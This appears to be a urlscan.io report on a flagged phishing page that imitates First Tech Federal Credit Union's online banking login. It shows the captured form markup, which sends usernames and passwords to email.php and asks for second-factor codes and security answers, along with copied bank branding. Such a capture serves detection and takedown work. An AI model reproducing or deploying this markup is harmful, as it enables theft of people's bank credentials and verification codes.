ngreen-cafe.sakura.ne.jp Open in urlscan Pro
59.106.13.54  Malicious Activity! Public Scan

URL: https://ngreen-cafe.sakura.ne.jp/wp/wp-content/themes/seotheme/FirstTech/
Submission Tags: 7861466
Submission: On October 19 via api from GB — Scanned from JP

Form analysis 3 forms found in the DOM

POST email.php

<form action="email.php" autocomplete="off" class="clearfix" data-bind="submit: authenticatePassword" method="post">
  <div class="form-fields content-row clearfix">
    <h3 id="userNameLabel">Login To Verify Your Identity</h3>
    <input aria-labelledby="userNameLabel" autocomplete="off" data-bind="value: username, valueUpdate: 'afterkeydown'" id="UserName" name="UserName" placeholder="username" type="text" class="text">
    <input aria-labelledby="passwordLabel" autocomplete="off" data-bind="value: password, valueUpdate: 'afterkeydown'" id="Password" name="Password" placeholder="Password" type="password" class="password">
    <br class="clear"><br class="clear">
  </div>
  <div class="button-row clearfix">
    <!-- ko if: !isSyncing() -->
    <button type="submit" class="login-button" data-button-type="primary" data-bind="text: submitButtonText, enable: isSubmitEnabled" disabled="disabled">Log In</button>
    <!-- /ko -->
    <!-- ko if: isSyncing() --><!-- /ko -->
    <a href="" class="field-block" title=""></a>
    <br class="clear"><br class="clear">
  </div>
  <input name="__RequestVerificationToken" type="hidden" value="JJL_eGD4GbTfCxl-QDTKupC9Lj9rm6KTBtPLaX2ubKH685ztivPhZq06H1BrsquGXwk686wC2SKLb_-GssRgEc4BzXSV4Xl15pMrn9a4TXI1" class="hidden"><input id="uf" name="uf" type="hidden" value=""
    class="hidden">
  <input id="ad" name="ad" type="hidden" value="" class="hidden">
  <input id="ml" name="ml" type="hidden" value="" class="hidden">
  <input id="fmn" name="fmn" type="hidden" value="" class="hidden">
  <input id="fsn" name="fsn" type="hidden" value="" class="hidden">
  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="LocalStore" tabindex="-1" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="0" height="0">
    <param name="movie" value="/Areas/Authentication/Scripts/LocalStore.swf">
    <param name="quality" value="high">
    <param name="bgcolor" value="#EEEEEE">
    <param name="allowScriptAccess" value="sameDomain">
    <embed id="LocalStore" src="First%20Tech%20Federal%20Credit%20Union_files/LocalStore.swf" quality="high" wmode="transparent" bgcolor="#EEEEEE" name="/Areas/Authentication/Scripts/LocalStore.swf" allowscriptaccess="sameDomain"
      pluginspage="https://get.adobe.com/flashplayer/" type="application/x-shockwave-flash" tabindex="-1" width="0" height="0" align="middle">
  </object>
  <br class="clear"><br class="clear">
</form>

<form class="choices verify" data-bind="event: { submit: verifyAnswers.bind($data, Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.VerifyButtonText.VerifyingState']) }, submitBubble: false">
  <div class=" input-wrapper" data-bind="css: { error: isInvalid, 'font-icon-error': isInvalid }">
    <input type="text" data-bind="textInput: answers()[0], hasFocus: showVerifyCode(), attr: {placeholder: Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.EnterCodePlaceholder']}" autocomplete="off" class="text">
    <div class="error-message" data-bind="visible: isInvalid, text: Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.InvalidCodeMessage']"></div>
  </div>
  <input type="submit" class="button primary submit second_factor_submit"
    data-bind="css: { disabled: !hasAnsweredQuestions() }, enable: hasAnsweredQuestions, value: Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.VerifyButtonText']">
  <div class="resend" data-bind="visible: !resendingCode()">
    <a href="#" data-bind="click: function (data, event) { requestCode(data, event, true, Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.ResendCodeLinkText.ResendingState'])}, text: Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.ResendCodeLinkText'] "></a>
    <!-- ko if: choices().length > 1 -->
    <!-- ko text: Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.ResendCode.Or'] --><!-- /ko -->
    <a href="#" data-bind="click: reset, text: resetText"></a>
    <!-- /ko -->
  </div>
  <div class="resend" data-bind="visible: resendingCode">
    <span class="loading-indicator" data-bind="text: Alkami.Localization.SiteText['SecondFactorAuthentication.VerifyCode.ResendingIndicator']"></span>
  </div>
</form>

<form class="choices" data-bind="event: { submit: verifyAnswers.bind($data, Alkami.Localization.SiteText['SecondFactorAuthentication.Challenge.ContinueButtonVerifyingText']) }, submitBubble: false , css: name">
  <!-- ko foreach: choices -->
  <label data-bind="text: $rawData, attr: { for: 'security_question_' + $index() }"></label>
  <div class="input-wrapper" data-bind="css: { error: $parent.isInvalid }">
    <input aria-required="true" type="text" autocomplete="off"
      data-bind="textInput: $parent.answers()[$index()], hasFocus: $index() == 0, attr: { placeholder: $parent.name() === 'questions' ? Alkami.Localization.SiteText['SecondFactorAuthentication.Challenge.AnswerPlaceholder'] : Alkami.Localization.SiteText['SecondFactorAuthentication.Challenge.EnterCodePlaceholder'], id: 'security_question_' + $index(), name: 'Answers[' + $index() + ']', autofocus: $index() === 0 }"
      class="text">
    <div class="error-message" data-bind="visible: $parent.isInvalid, text: Alkami.Localization.SiteText['SecondFactorAuthentication.Challenge.InvalidCodeMessage']"></div>
  </div>
  <!-- /ko -->
  <input type="submit" class="button primary submit second_factor_submit"
    data-bind="css: { disabled: !hasAnsweredQuestions() }, enable: hasAnsweredQuestions, value: Alkami.Localization.SiteText['SecondFactorAuthentication.Challenge.VerifyButtonText']">
</form>

Text Content

LOG IN TO ONLINE BANKING



 * LOGIN TO VERIFY YOUR IDENTITY
   
   
   
   Log In
   
   
   
   

 * Verify Your First Tech Federal Credit Union Account Ownership.
   
   
   
   


ARE YOU USING A MOBILE DEVICE?


DOWNLOAD OUR MOBILE APPS

Accessing your finances on your phone has never been easier.
 * View your transactions history
 * Transfer funds
 * Find your closest location and contact information


More features coming soon!





PLEASE ENABLE JAVASCRIPT.

Enabling JavaScript is required for many online banking features to work. Please
choose your browser below to view instructions on how to enable JavaScript. When
you're done, refresh the page.


INTERNET EXPLORER


FIREFOX


GOOGLE CHROME


SAFARI








 * Contact Us
 * Locations
 * Disclosures
 * Browser Support
 * Mobile site
 * Routing # 321180379

Equal Housing Opportunity

This credit union is federally insured by the National Credit Union
Administration

Copyright © 2019 First Tech Federal Credit Union. All Rights Reserved




Raymond James corporate


Privacy Notice│ BrokerCheck®


Registered address: 1011 Sunset Blvd, Rocklin, CA 95765 │ 855.744.8585







Financial Advisors offer securities through Raymond James Financial Services,
Inc. Member FINRA/SIPC and securities are not insured by credit union insurance,
the NCUA or any other government agency, are not deposits or obligations of the
credit union, are not guaranteed by the credit union, and are subject to risks,
including the possible loss of principal. First Tech Federal Credit Union and
Addison Avenue Investment Services are not registered broker/dealers and are
independent of Raymond James Financial Services. Investment advisory services
offered through Raymond James Financial Services Advisors, Inc.

Raymond James Financial Advisors may only conduct business with residents of the
states and/or jurisdictions for which they are properly registered. Therefore, a
response to a request for information may be delayed. Please note that not all
of the investments and services mentioned are available in every state.
Investors outside of the United States are subject to securities and tax
regulations within their applicable jurisdictions that are not addressed on this
site. Contact your local Raymond James office for information and availability.

Links are being provided for information purposes only. Raymond James is not
affiliated with and does not endorse, authorize or sponsor any of the listed
websites or their respective sponsors. Raymond James is not responsible for the
content of any website or the collection or use of information regarding any
website's users and/or members.



Close

LOCALE CHANGE CONFIRMATION

Changing your preferred language affects all member-facing text, including
messages and notification alerts.

Please wait...






×





×